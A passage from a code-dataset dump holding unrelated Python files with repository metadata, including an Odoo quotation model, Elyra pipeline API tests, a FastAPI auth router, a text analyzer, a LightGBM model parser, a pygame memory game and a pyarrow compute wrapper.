and o.asian_spreadsheet_option_id.id == rec.id))\n\n def _compute_domain_template_option_ids(self):\n for rec in self:\n domain = []\n if type(rec.asian_quotation_id.id) == int:\n domain.append(('asian_quotation_id', '=', rec.asian_quotation_id.id))\n if type(rec.id) == int:\n domain.append(('id', '!=', rec.id))\n rec.domain_template_option_ids = domain and self.search(domain) or False\n\n @api.depends('asian_quotation_id.vat', 'asian_quotation_id.rate', 'asian_spreadsheet_product_ids', 'asian_spreadsheet_product_ids.hotel_price')\n def _compute_single_supp(self):\n for rec in self:\n hotel_price = sum(rec.asian_spreadsheet_product_ids.mapped('hotel_price')) / 2\n vat = 1 + max(0, rec.asian_quotation_id.vat) / 100\n rec.single_supp = rec.asian_quotation_id.rate and (hotel_price * 1000 * vat / rec.asian_quotation_id.rate) or 0\n","repo_name":"hippo99dev/asianwaytravel","sub_path":"asian_quotation/models/asian_spreadsheet_option.py","file_name":"asian_spreadsheet_option.py","file_ext":"py","file_size_in_byte":19013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27916169786","text":"import asyncio\nimport json\nimport os\n\nfrom conftest import KFP_COMPONENT_CACHE_INSTANCE\nimport jupyter_core\nimport pytest\nimport requests\nfrom tornado.httpclient import HTTPClientError\n\nfrom elyra.metadata.metadata import Metadata\nfrom elyra.metadata.schemaspaces import ComponentCatalogs\nfrom elyra.pipeline.parser import PipelineParser\nfrom elyra.pipeline.pipeline_constants import (\n COS_OBJECT_PREFIX,\n DISABLE_NODE_CACHING,\n ENV_VARIABLES,\n KUBERNETES_POD_ANNOTATIONS,\n KUBERNETES_POD_LABELS,\n KUBERNETES_SECRETS,\n KUBERNETES_SHARED_MEM_SIZE,\n KUBERNETES_TOLERATIONS,\n MOUNTED_VOLUMES,\n PIPELINE_DEFAULTS,\n PIPELINE_PARAMETERS,\n RUNTIME_IMAGE,\n)\nfrom elyra.pipeline.processor import PipelineProcessorManager\nfrom elyra.pipeline.runtime_type import RuntimeProcessorType\nfrom elyra.pipeline.runtime_type import RuntimeTypeResources\nfrom elyra.pipeline.validation import PipelineValidationManager\nfrom elyra.pipeline.validation import ValidationResponse\nfrom elyra.pipeline.validation import ValidationSeverity\nfrom elyra.tests.pipeline import resources\nfrom elyra.tests.util.handlers_utils import expected_http_error\n\ntry:\n import importlib.resources as pkg_resources\nexcept ImportError:\n # Try backported to PY<37 `importlib_resources`.\n import importlib_resources as pkg_resources\n\n\nCOMPONENT_CATALOG_DIRECTORY = os.path.join(jupyter_core.paths.ENV_JUPYTER_PATH[0], \"components\")\nTEST_CATALOG_NAME = \"test_handlers_catalog\"\n\n\ndef _async_return(result):\n # Helper function to return an arbitrary value when mocking awaits\n f = asyncio.Future()\n f.set_result(result)\n return f\n\n\ndef _get_resource_path(filename):\n resource_path = os.path.join(os.path.dirname(__file__), \"resources\", \"components\", filename)\n resource_path = os.path.normpath(resource_path)\n return resource_path\n\n\nasync def cli_catalog_instance(jp_fetch):\n # Create new registry instance with a single URL-based component\n # This is not a fixture because it needs to\n paths = [_get_resource_path(\"kfp_test_operator.yaml\")]\n\n instance_metadata = {\n \"description\": \"A test registry\",\n \"runtime_type\": RuntimeProcessorType.KUBEFLOW_PIPELINES.name,\n \"categories\": [\"New Components\"],\n \"paths\": paths,\n }\n instance = Metadata(\n schema_name=\"local-file-catalog\",\n name=TEST_CATALOG_NAME,\n display_name=\"New Test Catalog\",\n 
metadata=instance_metadata,\n )\n\n body = json.dumps(instance.to_dict())\n r = await jp_fetch(\n \"elyra\", \"metadata\", ComponentCatalogs.COMPONENT_CATALOGS_SCHEMASPACE_ID, body=body, method=\"POST\"\n )\n assert r.code == 201\n r = await jp_fetch(\"elyra\", \"metadata\", ComponentCatalogs.COMPONENT_CATALOGS_SCHEMASPACE_ID)\n assert r.code == 200\n metadata = json.loads(r.body.decode())\n assert len(metadata) >= 1\n\n\nasync def test_get_components(jp_fetch):\n # Ensure all valid components can be found\n runtime_type = RuntimeProcessorType.LOCAL\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n palette = json.loads(pkg_resources.read_text(resources, \"palette.json\"))\n assert payload == palette\n\n\nasync def test_get_components_runtime_name_vs_type(jp_fetch, caplog):\n # Ensure deprecation warning appears when querying endpoint with shorthand runtime name\n runtime_name = \"kfp\"\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_name)\n assert response.code == 200\n assert \"Deprecation warning: when calling endpoint\" in caplog.text\n caplog.clear()\n\n # Ensure no deprecation warning appears when using runtime type name. The type\n # is case-insensitive, e.g., a runtime type can use either lowercase 'local' or\n # uppercase 'LOCAL'\n runtime_type = RuntimeProcessorType.LOCAL # use LOCAL runtime type\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name.lower()) # fetch with 'local'\n assert response.code == 200\n assert \"Deprecation warning: when calling endpoint\" not in caplog.text\n\n\nasync def test_get_component_properties_config(jp_fetch):\n # Ensure all valid component_entry properties can be found\n runtime_type = RuntimeProcessorType.LOCAL\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name, \"notebook\", \"properties\")\n assert response.code == 200\n payload = json.loads(response.body.decode())\n\n template = pkg_resources.read_text(resources, \"generic_properties_template.jinja2\")\n template = template.replace(\"{{ component.name }}\", \"Notebook\")\n template = template.replace(\"{{ component.extensions|tojson }}\", '[\".ipynb\"]')\n template = template.replace(\"{% if elyra_owned_properties %}\", \"\")\n template = template.replace(\n \"\"\",\n {% for property in elyra_owned_properties|sort(attribute=\"property_id\") %}\n \"{{property.property_id}}\": {{ property.get_schema()|tojson }}{% if loop.index != loop|length %},{% endif %}\n {% endfor %}\n {% endif %}\"\"\",\n \"\",\n ) # remove Elyra-owned property rendering loop\n properties = json.loads(template)\n\n # Remove pipeline parameters from properties if necessary\n if not PipelineProcessorManager.instance().supports_pipeline_params(runtime_type=runtime_type):\n # Pipeline parameters are not supported and the property can be removed from the set\n properties[\"properties\"][\"component_parameters\"][\"properties\"].pop(PIPELINE_PARAMETERS, None)\n\n # Fetch Elyra-owned properties\n elyra_properties = json.loads(pkg_resources.read_text(resources, \"additional_generic_properties.json\"))\n properties[\"properties\"][\"component_parameters\"][\"properties\"].update(elyra_properties) # update property dict\n assert payload == properties\n\n\n@pytest.mark.parametrize(\"catalog_instance\", [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)\nasync def test_get_component_properties_definition(catalog_instance, 
jp_fetch, caplog):\n # Ensure the definition for a component can be found\n component_url = (\n \"https://raw.githubusercontent.com/elyra-ai/examples/main/component-catalog-connectors/\"\n \"kfp-example-components-connector/kfp_examples_connector/resources/download_data.yaml\"\n )\n definition = requests.get(component_url)\n\n component_id = \"elyra-kfp-examples-catalog:a08014f9252f\" # static id for the 'Download Data' example component\n\n # Test with shorthand runtime (e.g. 'kfp', 'airflow') (support to be removed in later release)\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"kfp\", component_id)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n assert payload[\"content\"] == definition.text\n assert payload[\"mimeType\"] == \"text/x-yaml\"\n\n assert \"Deprecation warning\" in caplog.text\n caplog.clear()\n\n # Test with runtime type name in endpoint\n runtime_type = RuntimeProcessorType.KUBEFLOW_PIPELINES\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name, component_id)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n assert payload[\"content\"] == definition.text\n assert payload[\"mimeType\"] == \"text/x-yaml\"\n\n assert \"Deprecation warning\" not in caplog.text\n\n\nasync def test_runtime_types_resources(jp_fetch):\n # Ensure appropriate runtime types resources can be fetched\n response = await jp_fetch(\"elyra\", \"pipeline\", \"runtimes\", \"types\")\n assert response.code == 200\n\n resources = json.loads(response.body.decode())\n\n runtime_types = resources[\"runtime_types\"]\n assert len(runtime_types) >= 1 # We should have Local for sure\n for runtime_type_resources in runtime_types:\n assert runtime_type_resources.get(\"id\") in [\"LOCAL\", \"KUBEFLOW_PIPELINES\", \"APACHE_AIRFLOW\", \"ARGO\"]\n\n # Acquire corresponding instance and compare that results are the same\n runtime_type = RuntimeProcessorType.get_instance_by_name(runtime_type_resources.get(\"id\"))\n resources_instance = RuntimeTypeResources.get_instance_by_type(runtime_type)\n\n assert runtime_type_resources.get(\"display_name\") == resources_instance.display_name\n assert runtime_type_resources.get(\"export_file_types\") == resources_instance.export_file_types\n assert runtime_type_resources.get(\"icon\") == resources_instance.icon_endpoint\n\n\nasync def test_double_refresh(jp_fetch):\n # Ensure that attempts to refresh the component cache while another is in progress result in 409\n\n await cli_catalog_instance(jp_fetch)\n\n refresh = {\"action\": \"refresh\"}\n body = json.dumps(refresh)\n\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert response.code == 204\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert expected_http_error(e, 409)\n # Give the first refresh attempt a chance to complete and try again to ensure it has\n await asyncio.sleep(2)\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert response.code == 204\n\n\nasync def test_malformed_refresh(jp_fetch):\n # Ensure that providing the endpoints with a bad body generate 400 errors.\n refresh = {\"no-action\": \"refresh\"}\n body = json.dumps(refresh)\n\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert 
expected_http_error(e, 400)\n\n refresh = {\"action\": \"no-refresh\"}\n body = json.dumps(refresh)\n\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert expected_http_error(e, 400)\n\n\nasync def test_get_pipeline_properties_definition(jp_fetch):\n runtime_list = [\"kfp\", \"airflow\", \"local\"]\n\n for runtime in runtime_list:\n response = await jp_fetch(\"elyra\", \"pipeline\", runtime, \"properties\")\n assert response.code == 200\n payload = json.loads(response.body.decode())\n # Spot check\n\n pipeline_properties = [\"name\", \"runtime\", \"description\", PIPELINE_DEFAULTS]\n assert all(prop in payload[\"properties\"] for prop in pipeline_properties)\n\n default_properties = [\n COS_OBJECT_PREFIX,\n RUNTIME_IMAGE,\n ENV_VARIABLES,\n KUBERNETES_SECRETS,\n KUBERNETES_TOLERATIONS,\n MOUNTED_VOLUMES,\n KUBERNETES_POD_ANNOTATIONS,\n KUBERNETES_POD_LABELS,\n DISABLE_NODE_CACHING,\n KUBERNETES_SHARED_MEM_SIZE,\n ]\n if runtime == \"airflow\":\n # exclude properties that are not supported by this runtime\n default_properties.remove(DISABLE_NODE_CACHING)\n default_properties.remove(KUBERNETES_SHARED_MEM_SIZE)\n assert all(\n prop in payload[\"properties\"][PIPELINE_DEFAULTS][\"properties\"] for prop in default_properties\n ), runtime\n\n\nasync def test_pipeline_success(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n # Create a response that will trigger the valid code path\n validation_response = ValidationResponse()\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(validation_response))\n monkeypatch.setattr(PipelineParser, \"parse\", lambda x, y: \"Dummy_Data\")\n monkeypatch.setattr(PipelineProcessorManager, \"export\", lambda x, y, z, aa, bb: _async_return(\"test.py\"))\n\n json_body = json.dumps(request_body)\n\n http_response = await jp_fetch(\"elyra\", \"pipeline\", \"export\", body=json_body, method=\"POST\")\n\n assert http_response.code == 201\n\n\nasync def test_pipeline_failure(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n # Create a response that will trigger the fatal code path\n bad_validation_response = ValidationResponse()\n bad_validation_response.add_message(severity=ValidationSeverity.Error, message_type=\"invalidJSON\", message=\"issue\")\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(bad_validation_response))\n\n json_body = json.dumps(request_body)\n\n # Will raise HTTP error so we need to catch with pytest\n with pytest.raises(HTTPClientError):\n await jp_fetch(\"elyra\", \"pipeline\", \"export\", body=json_body, method=\"POST\")\n\n\nasync def test_validation_handler(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(ValidationResponse()))\n json_body = json.dumps(request_body)\n http_response = await jp_fetch(\"elyra\", \"pipeline\", \"validate\", body=json_body, method=\"POST\")\n\n assert http_response.code == 200\n\n\nasync def test_get_pipeline_parameters_schema(jp_fetch, caplog):\n # Ensure all valid components can be found\n unsupported_runtime_types = [RuntimeProcessorType.LOCAL, 
RuntimeProcessorType.APACHE_AIRFLOW]\n for runtime_type in unsupported_runtime_types:\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", runtime_type.name, \"parameters\", method=\"GET\")\n assert expected_http_error(e, 405)\n msg_body = json.loads(e.value.response.body.decode()).get(\"message\")\n assert \"does not support pipeline parameters\" in msg_body\n\n runtime_type = RuntimeProcessorType.KUBEFLOW_PIPELINES\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name)\n assert response.code == 200\n","repo_name":"elyra-ai/elyra","sub_path":"elyra/tests/pipeline/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":13848,"program_lang":"python","lang":"en","doc_type":"code","stars":1696,"dataset":"github-code","pt":"35"} +{"seq_id":"69860819621","text":"from fastapi import APIRouter, Response, status, Depends\n\nfrom schemas import schemas\nfrom services.auth import AuthService\nfrom services.user import JWTBearer\n\nrouter = APIRouter(\n prefix='/auth',\n tags=['auth'],\n)\n\n\n@router.post(\n '/register',\n status_code=status.HTTP_201_CREATED,\n response_model=schemas.UserResponseSchema\n)\nasync def create_user(\n payload: schemas.CreateUserSchema,\n auth_service: AuthService = Depends()\n):\n return auth_service.register_new_user(payload)\n\n\n@router.post(\n '/authenticate',\n status_code=status.HTTP_200_OK,\n response_model=schemas.TokenSchema\n)\nasync def authenticate_user(\n payload: schemas.LoginUserSchema,\n auth_service: AuthService = Depends(),\n):\n return auth_service.authenticate_user(payload)\n","repo_name":"GoreevArtem/TrashDetectApi","sub_path":"backend/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22712130793","text":"import re\nimport sys\nimport pandas as pd\n\ndef read_file(path):\n ''' Reads file is as a string. '''\n with open(path, 'r') as f:\n return f.read()\n\ndef get_words(s):\n ''' Returns a list of words from an inputted string. '''\n s = re.sub('[.!?,:;]', '', s)\n return [word.lower() for word in s.split(' ') if word != '']\n\ndef get_sentences(s):\n ''' Returns a list of sentences from an inputted string. '''\n return [sent for sent in re.split('[.!?]', s) if sent != '']\n\ndef word_count(s):\n ''' Returns total word count in inputted string. '''\n return len(get_words(s))\n\ndef unique_words (s):\n ''' Returns set of unique words from inputted string. '''\n return len(set(get_words(s)))\n\ndef avg_word_len(w):\n ''' Returns average word length in inputted string as float. '''\n return sum(len(word) for word in get_words(w)) / len(get_words(w))\n\ndef sent_count(s):\n ''' Returns total sentence count in inputted string. '''\n return len(get_sentences(s))\n\ndef avg_sent_len(s):\n ''' Returns average sentence length in inputted string as float. '''\n return sum(word_count(sent) for sent in get_sentences(s)) / sent_count(s)\n\ndef word_count_desc(s):\n ''' Returns a pandas DataFrame of frequently used words (at least one percent of text) in descending order of frequency from inputted string. 
'''\n word_count_dict = {}\n for w in set(get_words(s)):\n word_count_dict.update({w: get_words(s).count(w)})\n word_count_df = pd.DataFrame.from_dict(word_count_dict, orient='index')\n word_count_df = word_count_df.sort_values(by=[0], ascending=False)\n word_count_df = word_count_df[word_count_df[0]>(word_count(s)/100)]\n return word_count_df\n\ndef word_with_count(s):\n ''' Returns dictionary object from inputted string: keys equal unique words, values equal word count. '''\n word_count_dict = {}\n for w in set(get_words(s)):\n word_count_dict.update({w: get_words(s).count(w)})\n return word_count_dict\n\ndef freq_phrases(s):\n '''\n Sets of three or more words used three or more times.\n '''\n pass\n\n\nassert word_count('These, are words!!') == 3\nassert word_count(' will this work?') == 3\nassert unique_words('how many Words many words?') == 3\nassert unique_words('the cat sat the sat cat bat!') == 4\nassert avg_word_len(\"this is this a test, a test! its test\") == 3\nassert avg_word_len('One two Three four, fives!') == 4\nassert sent_count('One. Two. Three! Four and five and six?') == 4\nassert sent_count('Many, many sentences. Some, are long. Some are short!') == 3\nassert avg_sent_len('One. Two. Three! Four and five and six?') == 2\nassert avg_sent_len('Many, many sentences. Some, long. Some are short! Ha Ha!') == 2.5\n# assert word_list_desc('Try these words out. Try again words. Try!') == ['try', 'words', 'again', 'these', 'out']\n# ties in frequency make the sorted order unstable between runs, so this assert is unreliable\nassert word_with_count('Try these words out. Try again words. Try!') == {'again': 1, 'out': 1, 'these': 1, 'try': 3, 'words': 2}\n\nif __name__ == '__main__':\n # if this is the main script, not a module imported into another script\n text = read_file(sys.argv[1]) #sys.argv[1] refers to the second item on the command line\n print('Word count: {}'.format(word_count(text)))\n print('Unique words: {}'.format(unique_words(text)))\n print('Average word length: {}'.format(round(avg_word_len(text), 2)))\n print('Sentence count: {}'.format(sent_count(text)))\n print('Average sentence length: {}'.format(round(avg_sent_len(text), 2)))\n if input('Type y to see a list of most common words in descending order of frequency. Type p to pass.') == 'y':\n print(word_count_desc(text))\n if input('Type y to see a dictionary of all words with their frequency. 
Type q to quit.') == 'y':\n print(word_with_count(text))\n","repo_name":"jeremymiller00/Pure_python_projects","sub_path":"Text_analyzer.py","file_name":"Text_analyzer.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14399928541","text":"import numpy as np\nimport lightgbm as lgb\n\ndef find_all_children_splits(split, splits_dict):\n \"\"\"\n This helper function finds all multigeneration children splits for an \n argument split.\n\n Arguments:\n split --The split for which you are trying to find children splits\n splits_dict -- A dictionary of all the splits in the tree\n \n Returns:\n A list containing the Node IDs of all children splits\n \"\"\"\n all_splits = []\n\n # Check if the immediate left child of the argument split is also a split.\n # If so append to the list then use recursion to generate the remainder\n left_child = splits_dict[split]['children'][0]\n if left_child in splits_dict:\n all_splits.append(left_child)\n all_splits.extend(find_all_children_splits(left_child, splits_dict))\n\n # Same as above but with right child\n right_child = splits_dict[split]['children'][1]\n if right_child in splits_dict:\n all_splits.append(right_child)\n all_splits.extend(find_all_children_splits(right_child, splits_dict))\n\n return all_splits\n\ndef find_all_children_leaves(split, splits_dict, leaves_dict):\n \"\"\"\n This helper function finds all multigeneration children leaves for an \n argument split.\n\n Arguments:\n split -- The split for which you are trying to find children leaves\n splits_dict -- A dictionary of all the split info in the tree\n leaves_dict -- A dictionary of all the leaf info in the tree\n\n Returns:\n A list containing all the Node IDs of all children leaves\n \"\"\"\n all_leaves = []\n\n # Find all the splits that are children of the relevant split\n all_splits = find_all_children_splits(split, splits_dict)\n\n # Ensure the current split is included\n if split not in all_splits:\n all_splits.append(split)\n\n # For each leaf, check if the parents appear in the list of children\n # splits (all_splits). 
If so, it must be a leaf of the argument split\n for leaf in leaves_dict:\n if leaves_dict[leaf]['parent'] in all_splits:\n all_leaves.append(leaf)\n\n return all_leaves\n\ndef parse_model(model):\n if str(type(model)) == \"<class 'lightgbm.basic.Booster'>\":\n whole_model = model.dump_model()\n else:\n model = lgb.Booster(model_file = model)\n # change the model to json format\n whole_model = model.dump_model()\n\n tree = {}\n for i in range(whole_model['tree_info'][-1]['tree_index']+1):\n\n node = whole_model['tree_info'][i][\"tree_structure\"]\n\n queue = [node]\n splits = {}\n\n # the very first node\n splits[\"split\"+str(queue[0][\"split_index\"])] = {'th': queue[0][\"threshold\"],\n 'col': queue[0][\"split_feature\"] }\n\n # flow through the tree\n while queue:\n \n # left child\n if \"left_child\" in queue[0].keys():\n queue.append(queue[0][\"left_child\"])\n # child is a split\n if \"split_index\" in queue[0][\"left_child\"].keys():\n splits[\"split\"+str(queue[0][\"left_child\"][\"split_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'left',\n 'th': queue[0][\"left_child\"][\"threshold\"], \n 'col': queue[0][\"left_child\"][\"split_feature\"]}\n # child is a leaf\n else:\n splits[\"leaf\"+str(queue[0][\"left_child\"][\"leaf_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'left', \n 'intercept': queue[0][\"left_child\"][\"leaf_const\"], \n 'slope': queue[0][\"left_child\"][\"leaf_coeff\"]}\n \n # right child\n if \"right_child\" in queue[0].keys():\n queue.append(queue[0][\"right_child\"]) \n # child is a split\n if \"split_index\" in queue[0][\"right_child\"].keys():\n splits[\"split\"+str(queue[0][\"right_child\"][\"split_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'right',\n 'th': queue[0][\"right_child\"][\"threshold\"], \n 'col': queue[0][\"right_child\"][\"split_feature\"]}\n # child is a leaf\n else:\n splits[\"leaf\"+str(queue[0][\"right_child\"][\"leaf_index\"])] = {'parent': \"split\"+str(queue[0][\"split_index\"]),\n 'direction': 'right',\n 'intercept': queue[0][\"right_child\"][\"leaf_const\"], \n 'slope': queue[0][\"right_child\"][\"leaf_coeff\"]}\n # delete the first node\n queue.pop(0)\n\n tree['tree'+str(i)] = splits\n\n nested_splits = {}\n nested_leaves = {}\n nested_thresholds = {}\n\n n_inputs = model.num_feature()\n for index in tree:\n\n splits = tree[index]\n for i in splits:\n # print(i)\n if 'parent' in splits[i].keys():\n splits[splits[i]['parent']]['children'] = []\n\n for i in splits:\n # print(i)\n if 'parent' in splits[i].keys():\n if splits[i]['direction'] == 'left': \n splits[splits[i]['parent']]['children'].insert(0,i)\n if splits[i]['direction'] == 'right': \n splits[splits[i]['parent']]['children'].append(i)\n\n leaves = {}\n for i in splits.keys():\n if i[0] == 'l':\n leaves[i] = splits[i]\n\n for leaf in leaves:\n del splits[leaf]\n\n for split in splits:\n # print(\"split:\" + str(split))\n left_child = splits[split]['children'][0]\n right_child = splits[split]['children'][1]\n \n if left_child in splits:\n # means left_child is split\n splits[split]['left_leaves'] = find_all_children_leaves(\n left_child, splits, leaves\n )\n else:\n # means left_child is leaf\n splits[split]['left_leaves'] = [left_child]\n # print(\"left_child\" + str(left_child))\n \n if right_child in splits:\n splits[split]['right_leaves'] = find_all_children_leaves(\n right_child, splits, leaves\n )\n else:\n splits[split]['right_leaves'] = [right_child]\n # print(\"right_child\" + 
str(right_child))\n\n splitting_thresholds = {}\n for split in splits:\n var = splits[split]['col']\n splitting_thresholds[var] = {}\n for split in splits:\n var = splits[split]['col']\n splitting_thresholds[var][split] = splits[split]['th']\n\n for var in splitting_thresholds:\n splitting_thresholds[var] = dict(sorted(splitting_thresholds[var].items(), key=lambda x: x[1]))\n\n for split in splits:\n var = splits[split]['col']\n splits[split]['y_index'] = []\n splits[split]['y_index'].append(var)\n splits[split]['y_index'].append(\n list(splitting_thresholds[var]).index(split)\n )\n\n features = np.arange(0,n_inputs)\n\n for leaf in leaves:\n leaves[leaf]['bounds'] = {}\n for th in features:\n for leaf in leaves:\n leaves[leaf]['bounds'][th] = [None, None]\n \n # import pprint\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(splits)\n # pp.pprint(leaves)\n for split in splits:\n var = splits[split]['col']\n for leaf in splits[split]['left_leaves']:\n leaves[leaf]['bounds'][var][1] = splits[split]['th']\n\n for leaf in splits[split]['right_leaves']:\n leaves[leaf]['bounds'][var][0] = splits[split]['th']\n\n nested_splits['tree' + str(index)] = splits\n nested_leaves['tree' + str(index)] = leaves\n nested_thresholds['tree' + str(index)] = splitting_thresholds\n\n return nested_splits, nested_leaves, nested_thresholds\n ","repo_name":"linshumeng/OMLT_ML","sub_path":"src/lightgbm_model.py","file_name":"lightgbm_model.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"13127432019","text":"import pygame\nfrom pygame.locals import *\nimport sys\nfrom game import *\n\nFPS = 30 #frames per second\nMOVE_TIME = 500 #each move is displayed for 500 ms\nSCREEN_SIZE = (500, 500)\n\ndef main():\n\n\tpygame.init()\n\n\tscreen = pygame.display.set_mode(SCREEN_SIZE)\n\tclock = pygame.time.Clock()\n\tpygame.display.set_caption(\"PyMemory\")\n\n\tgame = Game(SCREEN_SIZE[0], SCREEN_SIZE[1])\n\tgame.draw_all(screen)\n\tgame.generate_moves()\n\tgame.update_score(screen)\n\tgame.draw_credits(screen)\n\n\telapsed = 0\n\ti = 0\n\tlast = 0\n\tdrawn = False\n\tpause = False\n\n\twhile 1:\n\t\telapsed += clock.tick(FPS)\n\n\t\tif game.current_player == 0: #CPU turn\n\t\t\tif pause == False: \n\t\t\t\tif drawn == False:\n\t\t\t\t\tgame.delete_cpu_move(screen, game.cpu_moves[last])\n\t\t\t\t\tgame.draw_cpu_move(screen, game.cpu_moves[i])\n\t\t\t\t\tdrawn = True\n\t\t\t\tif elapsed >= MOVE_TIME:\n\t\t\t\t\tlast = i\n\t\t\t\t\ti += 1\n\t\t\t\t\tif i > len(game.cpu_moves) - 1:\n\t\t\t\t\t\tgame.toggle_turn()\n\t\t\t\t\tgame.delete_cpu_move(screen, game.cpu_moves[last])\n\t\t\t\t\telapsed = 0\n\t\t\t\t\tdrawn = False\n\t\t\t\t\tpause = True\n\t\t\telse:\n\t\t\t\tif elapsed >= MOVE_TIME:\n\t\t\t\t\tpause = False\n\t\t\t\t\telapsed = 0\n\n\t\t\tpygame.event.clear([pygame.KEYDOWN, pygame.KEYUP]) #discard key events generated during the CPU turn\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\n\t\telif game.current_player == 1: #Player turn\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit(0)\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == K_ESCAPE:\n\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\telif event.key == K_UP:\n\t\t\t\t\t\tgame.draw_to(screen, 0)\n\t\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\t\tgame.draw_to(screen, 1)\n\t\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\t\tgame.draw_to(screen, 
2)\n\t\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\t\tgame.draw_to(screen, 3)\n\t\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\t\tif event.key == K_UP:\n\t\t\t\t\t\tgame.draw_from(screen, 0)\n\t\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\t\tgame.draw_from(screen, 1)\n\t\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\t\tgame.draw_from(screen, 2)\n\t\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\t\tgame.draw_from(screen, 3)\n\n\t\t\t\t\tif len(game.cpu_moves) == len(game.player_moves):\n\t\t\t\t\t\tgame.check_solution()\n\t\t\t\t\t\tgame.generate_moves()\n\t\t\t\t\t\tgame.toggle_turn()\n\t\t\t\t\t\tgame.update_score(screen)\n\t\t\t\t\t\telapsed = 0\n\t\t\t\t\t\ti = 0\n\t\t\t\t\t\tlast = 0\n\t\t\t\t\t\tdrawn = False\n\n\t\tpygame.display.flip()\n\nif __name__== \"__main__\":\n main()","repo_name":"Pyr0x1/PyMemory","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19580432669","text":"from pyarrow._compute import ( # noqa\n FilterOptions,\n Function,\n FunctionRegistry,\n function_registry,\n call_function\n)\nimport pyarrow._compute as _pc\n\n\ndef cast(arr, target_type, safe=True):\n \"\"\"\n Cast array values to another data type. Can also be invoked as an array\n instance method.\n\n Parameters\n ----------\n arr : Array or ChunkedArray\n target_type : DataType or type string alias\n Type to cast to\n safe : bool, default True\n Check for overflows or other unsafe conversions\n\n Examples\n --------\n >>> from datetime import datetime\n >>> import pyarrow as pa\n >>> arr = pa.array([datetime(2010, 1, 1), datetime(2015, 1, 1)])\n >>> arr.type\n TimestampType(timestamp[us])\n\n You can use ``pyarrow.DataType`` objects to specify the target type:\n\n >>> cast(arr, pa.timestamp('ms'))\n \n [\n 2010-01-01 00:00:00.000,\n 2015-01-01 00:00:00.000\n ]\n\n >>> cast(arr, pa.timestamp('ms')).type\n TimestampType(timestamp[ms])\n\n Alternatively, it is also supported to use the string aliases for these\n types:\n\n >>> arr.cast('timestamp[ms]')\n \n [\n 1262304000000,\n 1420070400000\n ]\n >>> arr.cast('timestamp[ms]').type\n TimestampType(timestamp[ms])\n\n Returns\n -------\n casted : Array\n \"\"\"\n if target_type is None:\n raise ValueError(\"Cast target type must not be None\")\n if safe:\n options = _pc.CastOptions.safe(target_type)\n else:\n options = _pc.CastOptions.unsafe(target_type)\n return call_function(\"cast\", [arr], options)\n\n\ndef _simple_unary_function(name):\n def func(arg):\n return call_function(name, [arg])\n return func\n\n\nascii_length = _simple_unary_function('ascii_length')\nascii_upper = _simple_unary_function('ascii_upper')\n\n\ndef sum(array):\n \"\"\"\n Sum the values in a numerical (chunked) array.\n\n 